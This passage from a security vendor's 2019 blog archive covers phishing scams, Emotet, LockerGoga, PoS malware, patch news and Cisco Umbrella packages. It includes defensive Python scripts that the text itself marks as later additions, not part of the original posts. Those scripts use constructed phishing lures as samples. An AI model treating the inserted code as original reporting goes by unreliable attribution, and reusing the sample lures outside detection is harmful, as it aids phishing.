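    Each occurrence of a banned word in the normalised password is worth one
    point and is removed; every remaining character is worth one point.
    Longer banned words are matched first so a match is not double counted.
    """
    remaining = normalise(password)
    matched = []
    for word in sorted(banned, key=len, reverse=True):
        count = remaining.count(word)
        if count:
            matched.extend([word] * count)
            remaining = remaining.replace(word, "")
    return len(matched) + len(remaining), matched


def check_password(password: str, custom_banned: set = CUSTOM_BANNED):
    """Return (accepted, matched words). A rejected password gets ERROR_MESSAGE."""
    points, matched = score(password, GLOBAL_BANNED | custom_banned)
    return points >= MIN_POINTS, matched


if __name__ == "__main__":
    for candidate in ["P@ssw0rd1!", "Ironshare1", "correct horse battery staple"]:
        accepted, matched = check_password(candidate)
        print(f"{candidate!r}: {'accepted' if accepted else 'rejected'} (matched {matched})")
        if not accepted:
            print("  " + ERROR_MESSAGE)
```

The point of the scoring step is that a banned word surrounded by a single digit or symbol ("Ironshare1") still fails, while a long passphrase built from ordinary words passes; a plain substring blacklist would get the first case right but would also reject any long password that happened to contain a banned word.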

This is a great step forward for Microsoft cloud users, and we recommend that organisations take steps to include this as another layer of security.

Read more on Bleeping Computer ….

And that’s it for this week's round-up, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #35 – 5th April 2019

By Stuart Hare on 4/4/19

Cyber Round-up

Cyber Round-up for 22nd March

Welcome to the Ironshare Cyber Round-up where we look back at the events of the last week and cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

  • Instagram Accounts Compromised in Copyright Scam
  • The Emotet Threat Keeps Rolling On!
  • Microsoft Dominates Most Exploited List in 2018
  • Ransomware or Wiper? LockerGoga Straddles the Line

Instagram Accounts Compromised in Copyright Scam

The Kaspersky Labs news blog has highlighted a new phishing scam that is targeting highly popular Instagram accounts.

Attackers have launched a phishing campaign that is sending Copyright Infringement emails to users, in an attempt to get them to hand over their account login details, so they can take over their accounts.

The content of the email is pretty convincing, although anyone checking the links etc. will be able to identify that it is indeed fake.

The message contained in the email tries to scare the victim by claiming that, due to violating copyright laws, their account is being disabled and that they have 24 hours before the account is deleted.

Clicking the link in the email redirects the user to an Instagram phishing site that pretends to give the option of appealing the decision.

If you decide to appeal and click the link, the site then asks to verify your Instagram account by logging in with your credentials, which is where the fraudsters capture and steal your username and password.

After losing your credentials, they seal the deal by giving you a nice message before redirecting you to the real Instagram page.

Social media account hacks are commonplace in cyber crime and in misinformation campaigns that deliver fake news.

Being aware of these types of attacks will help you to spot malicious emails and protect both yourself and your personal data.

Awareness alone is not enough though, remember:

  • Never click on suspicious links.
  • Look out for any mistakes in spelling and grammar, both in the links and the email content.
  • Always check the URL in the browser's address bar to verify where you are being sent.
  • Enable Two Factor Authentication / Two-Step Verification on your accounts where available.
  • If in doubt delete the email, and never enter personal information unless you are sure.

Read more on Kaspersky Labs….
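The "check the links" advice above is easy to state and easy to get wrong, because a phishing host such as `instagram.com.appeal-center.example` starts with the brand's domain. The following Python script, added here as an example and not part of the Kaspersky post or the original article, pulls the anchors out of an email body and reports every link whose registrable domain is not the one the email claims to be from, naming the trick involved. The email body and hostnames are constructed, and the handling of two-level suffixes is a tiny stand-in for the Public Suffix List a real tool would use.

```python
"""Report links in an email that do not go where the email says they do.

Added example, not from the original post. The email body below is
constructed; TWO_LEVEL_SUFFIXES is a small placeholder for the real
Public Suffix List.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Placeholder for the Public Suffix List so "shop.example.co.uk" -> "example.co.uk".
TWO_LEVEL_SUFFIXES = {"co.uk", "org.uk", "com.au"}


def registrable_domain(host: str) -> str:
    """The part of a hostname that an attacker would actually have to register."""
    parts = host.lower().rstrip(".").split(".")
    if len(parts) >= 3 and ".".join(parts[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(parts[-3:])
    return ".".join(parts[-2:])


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def suspicious_links(html_body: str, expected_domain: str) -> list:
    """Return [(href, reason)] for links not under expected_domain."""
    collector = _LinkCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.links:
        host = (urlsplit(href).hostname or "").lower()
        dest = registrable_domain(host) if host else ""
        if dest == expected_domain:
            continue  # genuinely under the brand's domain (e.g. help.instagram.com)
        if expected_domain in host:
            reason = f"lookalike: '{expected_domain}' is only a subdomain of {dest}"
        elif expected_domain in text.lower():
            reason = f"link text mentions {expected_domain} but goes to {dest or host or href}"
        else:
            reason = f"external destination {dest or host or href}"
        findings.append((href, reason))
    return findings


# Constructed sample resembling the copyright-scam email.
SAMPLE_EMAIL = """
<p>Your account violates copyright laws and will be deleted in 24 hours.</p>
<p><a href="https://instagram.com.appeal-center.example/login">Appeal this decision</a></p>
<p><a href="https://help.instagram.com/">Help Centre</a></p>
<p><a href="http://account-verify.example/ig">https://www.instagram.com/accounts/</a></p>
"""

if __name__ == "__main__":
    for href, reason in suspicious_links(SAMPLE_EMAIL, "instagram.com"):
        print(f"{href}\n    {reason}")
```

The comparison is made on the registrable domain rather than on the hostname prefix, which is exactly the check a reader should make in the address bar: read the domain from the right-hand end, not the left.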

The Emotet Threat Keeps Rolling On!

Back in 2014, security researchers came across a new threat in the wild they dubbed Emotet.

Emotet started out its life as a banking trojan that infected target machines with the goal of silently stealing sensitive personal and financial information from its victims.

Almost five years on from this initial find, Emotet has become one of the most active, costly and destructive malware families in the world today.

Emotet is known as a ‘Trojan Virus’, and like the Trojan Horse in Greek history, it appears to be one thing on the surface while inside it’s something very different. The trojan's job is to first infect a target system by evading its security defences, before unleashing the more malicious hidden payload it is carrying inside.

One of the attractions for cyber criminals is its polymorphic behaviour, which gives Emotet the ability to change itself every time a version of the malware is downloaded. This is one of the methods it uses to evade detection by signature-based Anti-Virus and Intrusion Prevention products.

Today, Emotet has evolved into far more than just a standard banking trojan.

Read More ….

Microsoft Dominates Most Exploited List in 2018

Recorded Future has this week released its annual report on the Top 10 vulnerabilities of 2018.

The report highlights that for the second year in a row, Microsoft have come out on top as the most exploited software, with Office and Internet Exploder (oops, Explorer) appearing in 8 of the top 10 vulnerabilities listed.

Recorded Future’s analysis focused on exploit kits, phishing attacks, or remote access trojans that coincide with a vulnerability and occurred between 1 January 2018 and 31 December 2018. Their analysis was based on thousands of sources, including code repositories, deep web forum postings, and dark web sites.

The remaining 2 spots were taken by Adobe Flash Player, in the form of exploit kits and ransomware, and Google’s Android OS, targeted by the remote access trojan AndroRAT.

One vulnerability, CVE-2016-0189, has made the list for three years in a row. This vuln exists in Internet Explorer versions 9 to 11 and has been targeted by numerous exploit kits during that time. The reason for its persistent presence is a lack of full mitigation: although there have been security updates from Microsoft related to this CVE, the only workaround appears to be controlling access to the JScript and VBScript DLL files.

What this report really highlights is that there are still too many devices out there that are not being kept up to date with the latest security patches. It’s not just operating systems (like MS Windows) that require regular security updates; applications, network devices and IoT devices should also form part of any regular patching activities.

If you’re a home user the best option is to ensure that all devices (PCs, mobiles, tablets etc.) are set to update themselves automatically as new versions become available.

A full copy of the report can be viewed here: https://go.recordedfuture.com/hubfs/reports/cta-2019-0319.pdf

Read more on Recorded Future ….

Ransomware or Wiper? LockerGoga Straddles the Line

The Cisco Talos Intelligence team have released another excellent blog post which details the investigation into a destructive Ransomware variant known as LockerGoga.

Like other Ransomware variants, LockerGoga encrypts the contents of the victim’s machine, preventing access to the data and holding it to ransom. The attackers typically request payment via a crypto currency such as Bitcoin from the victim, before they release the decryption keys providing access to the data once more.

Certain versions of LockerGoga have been seen to log out users and prevent them from logging back in, leaving them with no means to access the system or decrypt the files, which indicates a more destructive nature.

The initial infection vector is not currently known, but unlike other versions of ransomware the ransom note that is left on the machine does not include payment instructions, and instead just leaves details for contacting the attackers.

This threat is still being monitored and analysed by Talos, so we can expect more information to follow as it becomes available.

As usual with these types of posts from Talos, this is an in-depth technical write-up so is not for everyone, but if you’re into your malware analysis details, then head on over to the Talos blog to read more.

Read the full post on the Talos Blog ….

And that’s it for this week, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #34 – 22nd March 2019

By Stuart Hare on 21/3/19

Technical Archives
Products and Services

The Emotet Threat Keeps Rolling On!

Back in 2014, security researchers came across a new threat in the wild they dubbed Emotet.

Emotet started out its life as a banking trojan that infected target machines with the goal of silently stealing sensitive personal and financial information from its victims.

Almost five years on from this initial find, Emotet has become one of the most active, costly and destructive malware families in the world today.

Emotet is known as a ‘Trojan Virus’, and like the Trojan Horse in Greek history, it appears to be one thing on the surface while inside it’s something very different. The trojan's job is to first infect a target system by evading its security defences, before unleashing the more malicious hidden payload it is carrying inside.

One of the attractions for cyber criminals is its polymorphic behaviour, which gives Emotet the ability to change itself every time a version of the malware is downloaded. This is one of the methods it uses to evade detection by signature-based Anti-Virus and Intrusion Prevention products.

Today, Emotet has evolved into far more than just a standard banking trojan.

Emotet’s Evolution?

Due to its versatility it has become a favourite for cyber criminals in their efforts to improve the chance of successful infection of a target. As described above, it no longer just seeks to deliver banking malware; its continued evolution sees the addition of newly developed modules that allow it to remain an effective delivery platform for different types of malware.

Emotet primarily uses malspam campaigns to spread via email, typically containing a malicious email attachment in the form of a macro-enabled Microsoft Office document. Following initial infection Emotet has the capability to steal personal information and online credentials, before launching its hidden payload.
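Because the initial foothold is a macro-enabled Office attachment, one useful control at the mail gateway is to identify such attachments by content rather than by file name. The Python below is an added example, not code from the article or from any Cisco product: modern Office files are zip containers, and a document carries VBA macros when the archive contains a `vbaProject.bin` part, so the check opens the archive and looks for that part regardless of the extension. Legacy binary `.doc`/`.xls` files are only identified by their OLE signature here, since spotting macros in those needs an OLE stream parser. All the attachments are constructed in memory.

```python
"""Flag email attachments that are macro-enabled Office documents.

Added example (not from the original article). OOXML documents are zip
containers; one with VBA macros contains a vbaProject.bin part. Legacy
binary Office files are recognised by their OLE signature only. The
attachments below are constructed in memory for the demo.
"""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls/.ppt container
MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm"}


def classify_attachment(filename: str, data: bytes) -> str:
    """Return 'macro', 'legacy-ole', 'clean' or 'unknown' for one attachment."""
    lower = filename.lower()
    if data.startswith(OLE_MAGIC):
        # May or may not carry macros; a full OLE parser (e.g. oletools) is needed to tell.
        return "legacy-ole"
    if data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = {n.lower() for n in zf.namelist()}
        except zipfile.BadZipFile:
            return "unknown"
        # Trust the archive, not the extension: a .docm renamed to .docx is still a .docm.
        if any(n.endswith("vbaproject.bin") for n in names):
            return "macro"
        if any(n.startswith(("word/", "xl/", "ppt/")) for n in names):
            return "clean"
        return "unknown"
    if any(lower.endswith(ext) for ext in MACRO_EXTENSIONS):
        return "macro"          # extension says macro-enabled but body is unreadable
    return "unknown"


def triage(attachments: dict) -> dict:
    """Classify every (filename -> bytes) attachment of a message."""
    return {name: classify_attachment(name, data) for name, data in attachments.items()}


def _build_ooxml(parts: dict) -> bytes:
    """Build a minimal OOXML-style zip with the given parts (test helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample attachments. The macro-enabled file is deliberately
# named .docx, because malspam does not respect naming conventions.
SAMPLE_ATTACHMENTS = {
    "invoice.docx": _build_ooxml({"word/document.xml": "<w:document/>"}),
    "invoice_march.docx": _build_ooxml({"word/document.xml": "<w:document/>",
                                        "word/vbaProject.bin": b"\x00constructed-vba"}),
    "statement.doc": OLE_MAGIC + b"\x00" * 64,
    "notes.txt": b"plain text",
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_ATTACHMENTS).items():
        print(f"{name:22} {verdict}")
```

A gateway rule built on this would quarantine `macro` verdicts and route `legacy-ole` ones to a sandbox or a proper OLE parser, which is cheaper than relying on a signature that a polymorphic loader changes with every download.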

Malicious payloads such as ransomware, Quakbot, TrickBot, Ursnif, Zeus Panda & IcedID are just a few that have been delivered using the Emotet family.

Once a target system has been infected, it uses modules within the malware to spread throughout the network, via brute forcing techniques and SMB exploits (such as DoublePulsar & EternalBlue), to connect to and infect more servers and devices.

In addition to security evasion techniques, it can also detect when it is inside a malware analysis sandbox. And through its established Command & Control infrastructure (C2), Emotet can receive instructions and software updates that can extend the capabilities of the malware or add further malicious payloads.

The image below (courtesy of the US-CERT website) shows how Emotet works:

[Figure: emotet_malware_figure_2]

All this just helps the attackers stay ahead of the game and increases the spread of the malware.

What can we do?

Although Emotet is a family of advanced malware, it’s not all doom and gloom. There are things you can be doing to protect yourself from the threat of infection.

Cisco Umbrella is the first line of defence against internet threats and is an effective first step in stopping an Emotet infection in its tracks.

With up to 500 newly generated malicious documents being hosted on compromised websites every day, you need a solution that can dynamically protect you.

Researchers at Cisco have developed a classifier to automatically detect and block these Malspam campaigns. By integrating this classifier into Cisco Security products such as Cisco Umbrella, we can actively protect against this threat.

As soon as Emotet is detected, Cisco Umbrella can block traffic at the IP or domain level, or alternatively send it to the Intelligent Proxy for further inspection. You no longer need to wait for a connection to be made or malware to be downloaded to detect the threat.

By using Cisco Umbrella, you can prevent your users, devices and networks from ever establishing a connection to these bad domains or IP addresses.

[Images: Umbrella Investigate console views for two blocked domains, baatzconsulting and structure.thememove]

At Ironshare we are actively using Cisco Umbrella to protect our customers from the threat of Emotet.

The images above show just a couple of examples of the compromised domains from Umbrella Investigate that have been blocked this year, preventing our customers from infection and almost certain compromise.

If you would like to find out more about how Cisco Umbrella could protect your business, or if you would like a free trial, please use the link below to contact us.

By Stuart Hare on 20/3/19

Products and Services

What Cisco Umbrella package should I consider?

Let's talk Cisco Umbrella and the various packages on offer. "Umbrella package" is a very broad term, but essentially Cisco offer five variants of the same product, each with its own particular set of benefits, and each suited to specific business needs.

On top of the Cisco product, Ironshare offer a number of additional services.

Let's take a look at each option, its pros and cons, and how much it costs, and then see if we can narrow it down a bit so that you make the right choice for your company.

First up, we have the Cisco Umbrella ‘Roaming’ package.

This is the basic network security package that only protects employees classed as roaming users who are not regularly connected to your network (i.e. it won’t provide any protection for internal non-roaming staff connected to the office network). It provides reporting on which websites are being accessed but does not enable you to block access to specific sites. The protection for this package is provided through the Cisco AnyConnect Roaming Security or Umbrella Roaming Clients.

You might want to purchase this if you want to know what sites your roaming employees are accessing, and also if you feel those same users lack security protection when away from the office.

This package does require existing Cisco Firewalls (ASA or NGFW) with Cisco AnyConnect Client software, or alternatively the Umbrella Roaming Client software.

It would be particularly useful for those employees that are often on the road like sales people, and would support and protect them when they connect remotely, even if they do not use your company VPN (Virtual Private Network).

Next, we have the ‘Branch’ package.

This package is targeted at companies that are medium sized or above, where branch or remote offices become more relevant. Security enforcement in these areas is difficult and there is often a lack of visibility of what the users are accessing, and whether local security controls are truly in operation.

Cisco Umbrella can be deployed very quickly and protect these branch offices (and their guests) from malware, botnet and phishing attacks. Protection is only offered whilst users are on the branch or remote office network (i.e. it doesn’t work if they go out on the road, or work from home). Content filtering can be applied if required; for example you might want to prevent users from accessing social media, gambling or other such sites when they are in work.

The Branch package is used by integrating Umbrella with your existing Cisco ISR 4000 devices. This is achieved by simply upgrading the software and establishing a secure connection to Cisco Umbrella.

It’s a good layer of basic threat protection that is pretty much ‘set and forget’ for the IT professionals that support it.

The Cisco Umbrella ‘WLAN’ package

Provides protection specifically for devices that connect to the internet using your Wi-Fi network. Umbrella WLAN integrates with a broad range of Wireless LAN Controllers and Access Points, including Cisco, Cradlepoint, Aruba, Aerohive and other WLAN products.

The Umbrella WLAN package brings the benefits of visibility and policy control for each public IP address and WLAN appliance configured.

The Cisco Umbrella ‘Professional’ package

Offers basic functionality both on and off your network and is ideally suited to retail and hospitality, healthcare, higher education and other industries that have a very widespread and decentralised operation.

It can be deployed to companies of any size, can replace existing web filters and also secures your users wherever they go. It’s a nice level of consistent security for companies and organisations that have many different networked sites and also where Guest Wi-Fi is prevalent.

The Umbrella ‘Insights’ package

Contains all of the benefits from the other packages we’ve discussed, and more. It’s ideal for companies that not only want to prevent security breaches, but also want to take action and proactively seek out recognised threats within the company.

For instance, an employee’s PC might have become infected with a virus from a memory stick or an email attachment, and it could be attempting to send company information out to a malicious website. Umbrella would not only prevent that external contact being made, but it would also be able to help pinpoint the PC that needs further investigation, e.g. a virus may need to be removed.

Companies interested in this proactive ‘clean up’ approach may recognise they have weaknesses within their current business security arrangement, or they might have other complications such as a decentralised network or a Bring Your Own Device (BYOD) policy.

Insights provides a layer of consistent security around the network perimeter. For companies that know they are susceptible to cyber-attacks, it enforces that first layer of security, provides further assurance and helps to prevent security breaches in the future.

Finally, there is the Umbrella ‘Platform’ package.

This is for larger businesses that have a dedicated security team in place, who are ready to take action in the event of a security breach. Global enterprises may well adopt the Platform package, particularly if they have been impacted in the past and have perhaps become aware that they need more visibility around their estate's security.

Once again Umbrella provides a layer of consistent security around the network perimeter, and can block threats that other products cannot see, often minimising remediation effort.

The Platform package includes a few extra services over and above Insights: it can integrate with other partner products through an Application Programming Interface (API), but most interestingly it includes access to the ‘Investigate’ console, which is where security teams can delve into the background of threats that are emerging in the wider world, or that have surfaced within their own company.

The threat intelligence provided through Investigate can quickly add a lot of background information to any security related findings, and can help Security Incident Response Teams (SIRTs) to identify the best steps for remediation.

Cisco Umbrella Packages Summary

You may be reading about Cisco Umbrella for the first time, and there’s lots to consider, so don’t worry if you’re still a bit confused about which product is best for your business.

The Ironshare way is to simplify security. We try and avoid jargon as much as possible, so let’s cut to the chase and underline what options we recommend to prospective customers. Hopefully it helps!

[Image: Cisco Umbrella Packages Summary]

In terms of the packages covered above Ironshare will be providing the following as our core offerings:

  • Umbrella MSSP (Managed Security Service Provider based on Insights)
  • Umbrella Insights
  • Umbrella Platform

Purchasing Options

Option 1 – Ironshare supply you with the licensed product

Maybe you’re quite familiar with the product range. As Cisco partners we can provide any of the Umbrella packages as a licensed product: you can install it within your environment, learn how to use Umbrella, and manage the day-to-day analysis and periodic reporting.

Option 2 – The Ironshare Managed Service for SMEs (Small and Medium sized businesses)

Whilst there is value throughout the entire Umbrella product range, at Ironshare our managed service is focused on the Cisco Umbrella Insights package. This ensures that your users are protected both on and off-network, and you can also control which websites they access both on-site within the office and externally when they are using your equipment in hotels and at home.

The additional benefit of this being an externally managed service is that we do the lot: from the rapid installation (with a little help from your techies), to the ongoing daily management and the regular reporting that helps you understand what websites users are accessing, and where threats exist (for example, we can identify PCs that may have become infected and are therefore automatically and consistently trying to access malicious websites throughout the day).

If your IT or security personnel want visible access to anything behind the scenes within Umbrella, we can provide them with console access for this purpose, but generally we take care of everything and report back our findings on a regular basis.

Option 3 – The Ironshare Enterprise Level Managed Service (Large businesses with 5000+ users)

For larger companies that have their own dedicated security team we usually recommend the ‘Platform’ package. It comes with a fully customisable and powerful backend interface, which your team can use to delve into any threats that Umbrella identifies, and it can also be a useful tool for internal security investigations.

We still offer a fully managed service, so can take the strain away from your team by feeding in detailed information to make their life easier. It’s more of a collaborative service, but lets your staff focus on their normal daily jobs without having to adopt and learn new products.

Conclusion

Cisco Umbrella is a very simple and yet very powerful Cloud based platform that can be remotely deployed (within a day in some instances, depending on the complexity of your network). Once it’s in operation, it provides immediate predictive security, both on and off your network, as well as content filtering and white and black list features to give better control over user activity, and much more.

Ironshare provide a fully managed service, meaning that all you need to do is tell us what you want to know about, and when. We’ll then tailor the service to your needs and deliver management reporting and recommendations as often as requested.

Our service is applicable to companies of all shapes and sizes, meaning that even the smallest businesses can get a full enterprise service, and use our reports to easily identify problem PCs or employee activity concerns.

If you'd like to get detailed pricing for any of these options, please click here to Contact Us.


By Stuart Hare on 15/3/19

Cyber Round-up

Cyber Round-up for 15th March

Welcome to the Ironshare Cyber Round-up where we look back at the events of the last week and cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

  • Microsoft Patch Tuesday – March 19
  • Rockstar Games Entices Users to Enable 2FA
  • TV Licensing Scams Cost the Public £830k
  • Cisco Talos - New PoS Malware for Sale
  • Intel Patch Windows Graphic Driver Flaws

Microsoft Patch Tuesday – March 19

The second Tuesday of the month is here, which means it's time for more monthly security updates from Microsoft. A total of 64 vulnerabilities have been addressed this month, which include 17 updates rated Critical, 45 Important, with 1 Medium and 1 rated Low.

These updates cover releases for Windows Operating Systems, Edge and Internet Explorer browsers, Office, SharePoint, DHCP, Team Foundation Server, Skype for Business and of course the ChakraCore scripting engine.

Microsoft’s Edge browser has updates that resolve 7 Critical CVEs related to memory corruption vulns in the scripting engine. These make a regular appearance on Patch Tuesday, and are caused by the way objects are handled in memory.

Read more ….

Rockstar Games Entices Users to Enable 2FA

I was pleased to see Rockstar Games actively trying to get its users to adopt two factor authentication on their accounts this week.

In the ‘Flight Week in GTA Online’ announcement which was posted to their website, Rockstar have generously offered a nice in-game bonus to any users that enable 2-step verification.

2-step verification is another name for 2FA and basically means you will need a code in addition to your username and password in order to access your account, providing an additional layer of security that protects accounts from unauthorised access.

Rockstar have stated that any user that adds 2FA to their Social Club account will be rewarded with:

  • $500,000 to their GTA Online account
  • 10 Gold Bars to their Red Dead Redemption Online account
  • And additional future benefits to both GTA and RDR Online

To enable 2-Step Verification on your Social Club account, go to the following link: https://socialclub.rockstargames.com/settings/mfa

This is a great step by Rockstar Games to incentivise its users to increase their account security. Let’s hope that other companies follow in their footsteps.

See the post on Rockstar Games ….

TV Licensing Scams Cost the Public £830k

Action Fraud UK have reported that fraudsters are not letting up, and they are still seeing a huge number of the TV licensing phishing scams that we first witnessed in September 2018.

The phishing campaign is continuing to target the general public, sending fake TV licensing emails that are convincing victims to part with their personal and financial information.

Action Fraud have received over 900 fraud cases, totalling more than £830,000 in financial losses for the victims, since April 2018.

To protect yourself against these types of phishing attacks:

  • Look out for fake emails, that may contain spelling or grammatical errors.
  • Ensure received emails have been sent from a valid source, by checking the actual email address and not just the display name.
  • If you are unsure never click on a link, open any attachments or enter any personal or financial details.
  • Scam emails are getting very convincing and may even include personal details, so stay vigilant.
  • If in doubt delete!
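The second point above, checking the actual address and not just the display name, is the one most often skipped because mail clients hide the address by default. The following Python is an added example, not from the Action Fraud report or the original article: it parses the `From` (and `Reply-To`) header of a raw message and reports when the real sending domain is not the one the display name implies. Both messages are constructed, and `tvlicensing.co.uk` is assumed for the demo to be the domain a genuine TV Licensing email would come from.

```python
"""Check whether an email's display name hides a sender from another domain.

Added example, not from the original article. The messages below are
constructed; "tvlicensing.co.uk" is assumed here to be the domain a
legitimate TV Licensing email would be expected to come from.
"""
from email import message_from_string
from email.utils import parseaddr


def _domain_of(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def sender_mismatch(raw_message: str, expected_domain: str) -> dict:
    """Compare the From display name with the real address behind it.

    Returns a dict with the parsed display name, address and domain, a
    'suspicious' flag and the list of reasons that set it.
    """
    msg = message_from_string(raw_message)
    display, address = parseaddr(msg.get("From", ""))
    domain = _domain_of(address)
    reasons = []

    if not domain:
        reasons.append("From header has no usable address")
    elif domain != expected_domain and not domain.endswith("." + expected_domain):
        reasons.append(f"address domain {domain!r} is not {expected_domain!r}")

    # A display name that is itself a different address is a classic trick:
    # 'billing@tvlicensing.co.uk <attacker@random.example>'.
    if "@" in display and display.lower() != address.lower():
        reasons.append("display name contains a different email address")

    # Replies routed elsewhere are another sign the visible sender is a mask.
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    if reply_to and _domain_of(reply_to) != domain:
        reasons.append(f"Reply-To goes to a different domain ({_domain_of(reply_to)})")

    return {"display": display, "address": address, "domain": domain,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample messages (headers only matter for this check).
PHISH = """From: TV Licensing <tvl-refund@mailer-9921.example>
Reply-To: refunds@collect-now.example
Subject: Your TV Licence could not be renewed
Content-Type: text/plain

We could not take payment. Update your details within 24 hours.
"""

LEGIT = """From: TV Licensing <donotreply@tvlicensing.co.uk>
Subject: Your TV Licence renewal
Content-Type: text/plain

Your licence has been renewed.
"""

if __name__ == "__main__":
    for label, raw in [("phish", PHISH), ("legit", LEGIT)]:
        result = sender_mismatch(raw, "tvlicensing.co.uk")
        print(f"{label}: {result['display']!r} <{result['address']}> "
              f"suspicious={result['suspicious']}")
        for reason in result["reasons"]:
            print("   -", reason)
```

Note that a matching domain is necessary but not sufficient, since the `From` header itself can be forged; that is what SPF, DKIM and DMARC checks at the receiving mail server are for, and this script is the manual equivalent of the one check a user can do in their own client.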

If you have been a victim of fraud then you can report your case using the Action Fraud UK website.

Read more on Action Fraud ….

Cisco Talos - New PoS Malware for Sale

A new post from the Cisco Talos team this week has identified and detailed a new Point of Sale malware called GlitchPoS, that infects sales websites and electronic retail sales machines (tills) with the goal of capturing credit card information.

Attackers can use this malware to increase their finances, and fund further criminal activities.

This new PoS malware has been found available for purchase on crimeware forums, and Talos believe that this is not the first malware that has been developed by this actor.

GlitchPoS is controlled by its own C2 infrastructure that includes a GUI based dashboard control panel. The dashboard reports the number of bots available and online, as well as the number of infected PoS devices.

Captured card data from the infected machines is sent to the C2 servers and displayed in the dashboard console so it can be easily accessed by the attackers.

Although it is unclear at this stage how many purchases of GlitchPoS have been made, it is clear that Point of Sale malware remains a lucrative option for cyber criminals, and development of this type of malware continues.

Cisco AMP and Umbrella can be used as effective controls that prevent this threat.

Cisco AMP for Endpoints can be used to detect and block this type of malware from executing on your devices.

While Cisco Umbrella can be used to prevent infected devices from communicating with the Command & Control (C2) servers.

It is also strongly advised that Point of Sale terminals are updated along with other IT infrastructure, and should be placed in their own network segment to ensure that they are isolated from your critical systems.

Read the full post on the Talos Blog ….

Intel Patch Windows Graphic Driver Flaws

Nineteen vulnerabilities have been patched by Intel for its Windows 10 graphics drivers, including two flaws rated with a high severity.

These two vulnerabilities are covered by CVE-2018-12214 and CVE-2018-12216.

The first is a memory corruption issue that exists in the kernel mode driver and allows an attacker with local access privileges to execute code on the target system.

The second has a CVSS rating of 8.2, also existing in the kernel mode driver, but this time it’s due to a lack of input validation that can allow an attacker to execute code with local privileges.

The remaining updates have a mix of low & medium severities, and may result in Information Disclosure, Denial of Service or Privilege Escalation.

Intel recommends that users of Intel Graphics Driver for Windows update to versions 10.18.x.5059 (aka 15.33.x.5059), 10.18.x.5057 (aka 15.36.x.5057), 20.19.x.5063 (aka 15.40.x.5063), 21.20.x.5064 (aka 15.45.x.5064) and 24.20.100.6373 or later.

Updates are available in the Intel download center: https://downloadcenter.intel.com/product/80939/Graphics-Drivers

Read more on Threat Post ….

And that’s it for this week, please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #33 – 15th March 2019

By Stuart Hare on 15/3/19


Ironshare is a provider of Information and Cyber Security services.
